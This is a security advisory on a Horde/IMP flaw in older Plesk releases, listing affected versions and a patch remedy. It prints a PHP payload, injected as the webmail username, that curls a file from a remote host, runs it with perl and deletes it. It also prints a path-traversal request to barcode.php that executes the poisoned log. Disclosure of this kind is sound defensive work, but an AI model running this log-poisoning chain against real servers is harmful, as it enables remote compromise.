Description
The Horde/IMP package (3.1.7-3.3.2) that is shipped with Plesk v. 8.x and earlier versions of 9.x (before 9.5.4) has a vulnerability that allows an attacker to run malicious software by passing the login to the webmail with a POST request to the /horde/imp/redirect.php file that includes the PHP code as the username. For example
<?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;perl new.txt;rm -rf new.txt"); ?>This results in the PHP code being logged to the /var/log/psa-horde/psa-horde.log file, which, due to a vulnerability in the barcode.php file, allows attackers to cause Horde to execute the code by making this request:
/horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log%00Plesk versions affected:
- Parallels Plesk Panel 9.3 for Linux/Unix
- Parallels Plesk Panel 9.2 for Linux/Unix
- Parallels Plesk Panel 9.0 for Linux/Unix
- Parallels Plesk Panel 8.6 for Linux/Unix
- Parallels Plesk Panel 9.3 for Windows
- Parallels Plesk Panel 9.2 for Windows
- Parallels Plesk Panel 9.0 for Windows
- Parallels Plesk Panel 8.6 for Windows
Remediation
Download and install the appropriate patch for Horde 3.1.7-3.3.2 in accordance with the platform your server runs on.
References
Related Vulnerabilities
PHP Improper Link Resolution Before File Access ('Link Following') Vulnerability (CVE-2014-3981)
Oracle HTTP Server Out-of-bounds Read Vulnerability (CVE-2021-36160)
MODX Unrestricted Upload of File with Dangerous Type Vulnerability (CVE-2022-26149)
Plone CMS Use of Externally-Controlled Format String Vulnerability (CVE-2017-5524)